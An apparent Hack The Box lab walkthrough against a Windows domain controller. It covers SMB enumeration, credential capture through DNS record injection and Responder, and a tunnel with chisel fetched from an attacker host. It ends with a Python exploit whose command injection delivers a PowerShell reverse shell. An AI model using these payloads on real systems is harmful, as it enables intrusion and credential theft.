└─$ nmap -sC -sV 10.129.1.202
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 08:14 -0500
Nmap scan report for 10.129.1.202
Host is up (0.37s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-21 13:15:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-21T13:16:50+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-21T13:16:13+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-21T13:16:12
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and requiredBack to back we also run advance/aggresive scan for all ports
└─$ nmap -sC -sV -A -p- 10.129.1.202
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 08:19 -0500
Nmap scan report for 10.129.1.202
Host is up (0.58s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-21 13:40:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
|_ssl-date: 2026-02-21T13:42:07+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-21T13:41:28+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-21T13:15:49
|_Not valid after: 2056-02-21T13:15:49
| ms-sql-info:
| 10.129.1.202:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.1.202:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
|_ssl-date: 2026-02-21T13:42:07+00:00; -1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
60617/tcp open msrpc Microsoft Windows RPC
61741/tcp open msrpc Microsoft Windows RPC
62165/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62166/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. Here, we can clearly see the extra open ports.
STEP II: Now we will enum4linux to extract user and groups information, but unfortunately it is asking for pass. So, we will try with smbclient command with default Id and Pass
└─$ smbclient -L 10.129.1.202 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableAfter getting error we tried with username=anonymous with smbmap tool
└─$ smbmap -H 10.129.1.202 -u "anonymous" -p ""
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports...
[-] Initializing hosts...
[|] Enumerating shares...
[+] IP: 10.129.1.202:445 Name: 10.129.1.202 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
software$ READ ONLY
SYSVOL NO ACCESS Logon server share
[|] Closing connections.. Here, we accessed and got info about shares.
STEP III: Now we try to login with smbclient, which have read only access (IPC$, software$)
└─$ smbclient //10.129.1.202/software$ -N
Try "help" to get a list of possible commands.
smb: \> ls
. DH 0 Fri May 16 21:27:07 2025
.. DHS 0 Thu Jan 1 01:46:47 2026
Monitoring DH 0 Fri May 16 21:32:43 2025
7147007 blocks of size 4096. 1198276 blocks available
smb: \> cd Monitoring\
smb: \Monitoring\> ls
. DH 0 Fri May 16 21:32:43 2025
.. DH 0 Fri May 16 21:27:07 2025
EntityFramework.dll AH 4991352 Thu Apr 16 16:38:42 2020
EntityFramework.SqlServer.dll AH 591752 Thu Apr 16 16:38:56 2020
EntityFramework.SqlServer.xml AH 163193 Thu Apr 16 16:38:56 2020
EntityFramework.xml AH 3738289 Thu Apr 16 16:38:40 2020
Microsoft.Management.Infrastructure.dll AH 36864 Mon Jul 17 10:46:10 2017
overwatch.exe AH 9728 Fri May 16 21:19:24 2025
overwatch.exe.config AH 2163 Fri May 16 21:02:30 2025
overwatch.pdb AH 30208 Fri May 16 21:19:24 2025
System.Data.SQLite.dll AH 450232 Sun Sep 29 16:41:18 2024
System.Data.SQLite.EF6.dll AH 206520 Sun Sep 29 16:40:06 2024
System.Data.SQLite.Linq.dll AH 206520 Sun Sep 29 16:40:42 2024
System.Data.SQLite.xml AH 1245480 Sat Sep 28 14:48:00 2024
System.Management.Automation.dll AH 360448 Mon Jul 17 10:46:10 2017
System.Management.Automation.xml AH 7145771 Mon Jul 17 10:46:10 2017
x64 DH 0 Fri May 16 21:32:33 2025
x86 DH 0 Fri May 16 21:32:33 2025
7147007 blocks of size 4096. 1200654 blocks available
smb: \Monitoring\> get overwatch.exe
getting file \Monitoring\overwatch.exe of size 9728 as overwatch.exe (5.3 KiloBytes/sec) (average 5.3 KiloBytes/sec)
smb: \Monitoring\> get overwatch.exe.config
getting file \Monitoring\overwatch.exe.config of size 2163 as overwatch.exe.config (1.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
smb: \Monitoring\> get overwatch.pdb
getting file \Monitoring\overwatch.pdb of size 30208 as overwatch.pdb (14.3 KiloBytes/sec) (average 7.2 KiloBytes/sec)
smb: \Monitoring\> ^CNow we get accessed and we download all files in local system with get command or and analyse.
STEP IV: We got all files in local system so, try to find something with cat command
Here, we got a link http://overwatch.htb:8000/MonitorService and move forward to another files
Also, we got a exe file so with any IDE decompile it and read the code.
I used a github repo https://github.com/dnSpy/dnSpy/releases
STEP V: After decompile we got a vulnerable code with database credential
("Server=localhost;Database=SecurityLogs;
User Id=sqxxxc;Password=TI0LxxxxZw1Vv;")STEP VI: Now we try to login on database so we find and got on port 6520 ms-sql-s service is running also domain name
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-21T13:15:49
|_Not valid after: 2056-02-21T13:15:49
| ms-sql-info:
| 10.129.1.202:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.1.202:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
└─$ impacket-mssqlclient -windows-auth overwatch.htb/<User>:'<Password>'@<Machine_IP> -p 6520
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (OVERWATCH\sqlsvc guest@master)> Now use commands for
SELECT SYSTEM_USER; # we switched to system user
SELECT * FROM sys.servers; # we got all existing database namesFrom here we got two databases names
S200401\SQLEXPRESS SQL Server SQLNCLI
SQL07 SQL Server SQLNCLINote: By default in windows 1433/tcp is for sql server but here it is on 6520.
STEP VII: We tried to ping SQL07 server but we don't, also tried with dig command but S200401 server we can ping and connect
─$ dig @10.129.1.202 SQL07.overwatch.htb # Not working
─$ dig @10.129.1.202 S200401.overwatch.htb # workingSTEP VIII: Now we understand, we can't ping it, so we tricked the server with DNS Hijacking, with DNS inbuild kali tool
└─$ dnstool
usage: dnstool.py [-h] [-u USERNAME] [-p PASSWORD] [--forest] [--legacy] [--zone ZONE] [--print-zones] [--print-zones-dn] [--tcp] [-k]
[-port port] [-force-ssl] [-dc-ip ip address] [-dns-ip ip address] [-aesKey hex key] [-r TARGETRECORD]
[-a {add,modify,query,remove,resurrect,ldapdelete}] [-t {A}] [-d RECORDDATA] [--allow-multiple] [--ttl TTL]
HOSTNAME
dnstool.py: error: the following arguments are required: HOSTNAME
└─$ dnstool -u OVERWATCH.HTB\\<User> -p '<Pass>' -r SQL07 -a add -t A -d <Attacker_IP> <Machine_IP>
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfullySTEP IX: Now we again verify with dig command and we can perfrom ping and other things
└─$ dig @10.129.1.202 SQL07.overwatch.htb
; <<>> DiG 9.20.18-1-Debian <<>> @10.129.1.202 SQL07.overwatch.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38028
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;SQL07.overwatch.htb. IN A
;; ANSWER SECTION:
SQL07.overwatch.htb. 180 IN A 10.10.16.29
;; Query time: 291 msec
;; SERVER: 10.129.1.202#53(10.129.1.202) (UDP)
;; WHEN: Sat Feb 21 10:15:59 EST 2026
;; MSG SIZE rcvd: 64STEP X: Now we use pivoting technique to capture the hash so we use a command and responder tool, use this on the logged in server
SQL (OVERWATCH\sqlsvc guest@master)> EXEC ('xp_dirtree ''\\SQL07.overwatch.htb\share''') AT [SQL07];
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.
SQL (OVERWATCH\sqlsvc guest@master)>
EXEC ('xp_dirtree ''\\SQL07.overwatch.htb\share''') AT [SQL07]; # Use this script In ServerSTEP XI: Open new terminal and paste it then paste the above script in the server terminal and see in this terminal
sudo responder -I tun0 # Use is in another terminal
[+] Listening for events...
[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[MSSQL] Cleartext Client : 10.129.1.202
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlxxxt
[MSSQL] Cleartext Password : bIhBbxxxnB82yx
[*] Skipping previously captured cleartext password for sqlmgmtSTEP XII: Now we got user and pass so we will now try to connect with our windows system
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.1.202 -u <User> -p '<Pass>'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> pwd
Path
----
C:\Users\sqlmgmt\DocumentsNow, try to findout the user.txt file
Evil-WinRM* PS C:\Users\sqlmgmt> ls
Directory: C:\Users\sqlmgmt
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/16/2025 8:09 PM Desktop
d-r--- 5/16/2025 8:08 PM Documents
d-r--- 5/8/2021 1:20 AM Downloads
d-r--- 5/8/2021 1:20 AM Favorites
d-r--- 5/8/2021 1:20 AM Links
d-r--- 5/8/2021 1:20 AM Music
d-r--- 5/8/2021 1:20 AM Pictures
d----- 5/8/2021 1:20 AM Saved Games
d-r--- 5/8/2021 1:20 AM Videos
*Evil-WinRM* PS C:\Users\sqlmgmt> cd Desktop
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> ls
Directory: C:\Users\sqlmgmt\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/21/2026 5:14 AM 34 user.txt
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt
<------------User-Flag----------->STEP XIII: Now we will try to find out root flag so moved into administrator user but it is denied
*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> ls
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Administrator>Means, now we have to perform Privilege Escalation
STEP XIV: Here, we will create a tunnel with the help of port forwarding so, I used a github repo https://github.com/jpillora/chisel and now, run the python server so that we can sent the chisel file into the victim machine and using wget command downloaded in the victim machine
─$ python3 -m http.server 8000 # Run on the chisel file downloaded machine
wget http://10.10.16.29:8000/chisel.exe -UseBasicParsing -OutFile chisel.exe
# run on the Victim machineNow, we got the file into victim machine
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> dir
Directory: C:\Users\sqlmgmt\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/21/2026 7:50 AM 10612224 chisel.exeSTEP XV: Now run this file on the victim machine powershell terminal using below command
./chisel.exe client <Attacker_IP>:<Custom_Port> R:8000:127.0.0.1:8000
2026/02/21 08:26:38 client: Connected (Latency 315.5769ms) # Connected_statusAlso in attacker machine terminal
chisel server --reverse --port <Custom_Port>STEP XVI: Open the browser of attacker machine and browse our initial got URL
http://localhost:8000/MonitorService
OR
http://127.0.0.1:8000/MonitorServiceSTEP XVII: Now in this link we got a website with another two links so opened and analyse the code
Update the links to read the code
http://overwatch.htb:8000/MonitorService?wsdl #Update <overwatch.htb> with <localhost>
http://overwatch.htb:8000/MonitorService?singleWsdl #Update <overwatch.htb> with <localhost>STEP XVIII: After analyse the code we found a vulnerability of Unauthenticated Remote Process Termination
STEP XIX: So, we try to exploit it with a payload also maintain the file structure
~/Downloads/overwatch/
├── exploit.py # your main Python script using zeep
├── local.wsdl # the edited WSDL with LOCAL schema imports
├── overwatch.exe # (probably the original binary from the box)
├── overwatch.exe.config # (config file that likely contained the WSDL URL)
├── overwatch.pdb # (debug symbols – optional/leftover)
├── schemas/ # folder with the two downloaded XSD files
│ ├── xsd0.xsd # main schema – contains KillProcess definition
│ └── xsd1.xsd # Microsoft serialization types (usually basic types)
└── venv/ # your Python virtual environment
├── bin/
├── lib/
└── ... (standard venv contents)
#Save file_name exploit.py
from zeep import Client
from zeep.transports import Transport
import requests
# Disable SSL warnings (not really needed here but harmless)
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
transport = Transport(session=session)
# Use the local WSDL file you downloaded
client = Client('local.wsdl', transport=transport)
print("[*] Client created successfully!")
print("Services found in WSDL:", list(client.wsdl.services.keys()))
if client.wsdl.services:
first_service_name = next(iter(client.wsdl.services))
print(f"First service name: {first_service_name}")
service_obj = client.wsdl.services[first_service_name]
print("Ports in first service:", list(service_obj.ports.keys()))
# If there's at least one port, use it explicitly
if service_obj.ports:
first_port_name = next(iter(service_obj.ports))
print(f"Using explicit service/port: {first_service_name} / {first_port_name}")
service = client.bind(service_name=first_service_name, port_name=first_port_name)
else:
print("No ports found in service → WSDL incomplete?")
raise ValueError("No ports")
else:
print("No services at all → check if <wsdl:service> exists in local.wsdl")
raise ValueError("No services defined")
# Get the service proxy
service = client.service
# Show what methods are actually available
print("[*] Client ready. Available methods:")
print([m for m in dir(service) if not m.startswith('_')])
print("\n[*] Trying to call KillProcess...\n")
# ────────────────────────────────────────────────────────────────
# TEST PAYLOAD (writes whoami to file - very safe & visible proof)
# ────────────────────────────────────────────────────────────────
test_payload = 'calc.exe; whoami > C:\\temp\\wcf_proof.txt & echo SUCCESS >> C:\\temp\\wcf_proof.txt; #'
try:
result = service.KillProcess(test_payload)
print("[+] Test payload executed successfully!")
print("Response from service:", result)
print("\nOn the target machine (in evil-winrm):")
print(" type C:\\temp\\wcf_proof.txt")
print(" → If you see your username + 'SUCCESS' → command injection is 100% working!")
except Exception as e:
print("[-] Test call failed:", str(e))
print(" → Possible fixes:")
print(" - Check if 'KillProcess' is listed in available methods above")
print(" - Try changing the method name to service.MonitoringService.KillProcess or similar")
print(" - Make sure chisel tunnel is still alive: curl http://127.0.0.1:8000/MonitorService")
# ────────────────────────────────────────────────────────────────
# REVERSE SHELL PAYLOAD (uncomment AFTER test file appears)
# ────────────────────────────────────────────────────────────────
# BEFORE UNCOMMENTING: start listener on Kali:
# rlwrap nc -lvnp 4446
ip = "10.10.16.29"
port = 4446
rev = (
f"$ErrorActionPreference='Continue'; "
f"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port}); "
f"$stream = $client.GetStream(); "
f"[byte[]]$bytes = 0..65535|%{{0}}; "
f"while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{ "
f" $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); "
f" try {{ $sendback = (iex $data 2>&1 | Out-String ) }} "
f" catch {{ $sendback = $_.Exception.Message + \"`n\" }}; "
f" $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; "
f" $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); "
f" $stream.Write($sendbyte,0,$sendbyte.Length); "
f" $stream.Flush() "
f"}}; "
f"$client.Close()"
)
payload = f"notepad; {rev}; #"
try:
result = service.KillProcess(payload)
print("\n[+] Reverse shell payload sent!")
print("Check your nc listener on port 4446 for incoming connection")
print("Once connected, immediately type: whoami /all")
except Exception as e:
print("[-] Reverse shell failed:", str(e))
#Save file_name local.wsdl
<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions name="MonitoringService" targetNamespace="http://tempuri.org/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:wsx="http://schemas.xmlsoap.org/ws/2004/09/mex"
xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
xmlns:wsa10="http://www.w3.org/2005/08/addressing"
xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"
xmlns:wsap="http://schemas.xmlsoap.org/ws/2004/08/addressing/policy"
xmlns:msc="http://schemas.microsoft.com/ws/2005/12/wsdl/contract"
xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:wsam="http://www.w3.org/2007/05/addressing/metadata"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:tns="http://tempuri.org/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:wsaw="http://www.w3.org/2006/05/addressing/wsdl"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<wsdl:types>
<xsd:schema targetNamespace="http://tempuri.org/Imports">
<xsd:import schemaLocation="schemas/xsd0.xsd" namespace="http://tempuri.org/"/>
<xsd:import schemaLocation="schemas/xsd1.xsd" namespace="http://schemas.microsoft.com/2003/10/Serialization/"/>
</xsd:schema>
</wsdl:types>
<wsdl:message name="IMonitoringService_StartMonitoring_InputMessage">
<wsdl:part name="parameters" element="tns:StartMonitoring"/>
</wsdl:message>
<wsdl:message name="IMonitoringService_StartMonitoring_OutputMessage">
<wsdl:part name="parameters" element="tns:StartMonitoringResponse"/>
</wsdl:message>
<wsdl:message name="IMonitoringService_StopMonitoring_InputMessage">
<wsdl:part name="parameters" element="tns:StopMonitoring"/>
</wsdl:message>
<wsdl:message name="IMonitoringService_StopMonitoring_OutputMessage">
<wsdl:part name="parameters" element="tns:StopMonitoringResponse"/>
</wsdl:message>
<wsdl:message name="IMonitoringService_KillProcess_InputMessage">
<wsdl:part name="parameters" element="tns:KillProcess"/>
</wsdl:message>
<wsdl:message name="IMonitoringService_KillProcess_OutputMessage">
<wsdl:part name="parameters" element="tns:KillProcessResponse"/>
</wsdl:message>
<wsdl:portType name="IMonitoringService">
<wsdl:operation name="StartMonitoring">
<wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/StartMonitoring" message="tns:IMonitoringService_StartMonitoring_InputMessage"/>
<wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/StartMonitoringResponse" message="tns:IMonitoringService_StartMonitoring_OutputMessage"/>
</wsdl:operation>
<wsdl:operation name="StopMonitoring">
<wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/StopMonitoring" message="tns:IMonitoringService_StopMonitoring_InputMessage"/>
<wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/StopMonitoringResponse" message="tns:IMonitoringService_StopMonitoring_OutputMessage"/>
</wsdl:operation>
<wsdl:operation name="KillProcess">
<wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/KillProcess" message="tns:IMonitoringService_KillProcess_InputMessage"/>
<wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/KillProcessResponse" message="tns:IMonitoringService_KillProcess_OutputMessage"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="BasicHttpBinding_IMonitoringService" type="tns:IMonitoringService">
<soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="StartMonitoring">
<soap:operation soapAction="http://tempuri.org/IMonitoringService/StartMonitoring" style="document"/>
<wsdl:input><soap:body use="literal"/></wsdl:input>
<wsdl:output><soap:body use="literal"/></wsdl:output>
</wsdl:operation>
<wsdl:operation name="StopMonitoring">
<soap:operation soapAction="http://tempuri.org/IMonitoringService/StopMonitoring" style="document"/>
<wsdl:input><soap:body use="literal"/></wsdl:input>
<wsdl:output><soap:body use="literal"/></wsdl:output>
</wsdl:operation>
<wsdl:operation name="KillProcess">
<soap:operation soapAction="http://tempuri.org/IMonitoringService/KillProcess" style="document"/>
<wsdl:input><soap:body use="literal"/></wsdl:input>
<wsdl:output><soap:body use="literal"/></wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="MonitoringService">
<wsdl:port name="BasicHttpBinding_IMonitoringService" binding="tns:BasicHttpBinding_IMonitoringService">
<soap:address location="http://127.0.0.1:8000/MonitorService"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>And generate xsd0 and xsd1 from below command
curl -v -H "Accept: text/xml" http://127.0.0.1:8000/MonitorService?xsd=xsd0 -o xsd0.xsd\ncurl -v -H "Accept: text/xml" http://127.0.0.1:8000/MonitorService?xsd=xsd1 -o xsd1.xsdSTEP XX: Now run the nc listener then python script (Note: It will need zeep package so install with pip install zeep and for that you have to create virtual environment so that pip will install and then run the python script)
Here, we can see that we got connected to the terminal
STEP XXI: Now moved to administrator user and got the root flag.
PS C:\Users\Administrator> cd desktop
PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/16/2025 5:00 PM 2308 Microsoft Edge.lnk
-ar--- 2/21/2026 5:14 AM 34 root.txt
PS C:\Users\Administrator\desktop> type root.txt
<--------Root-Flag------------>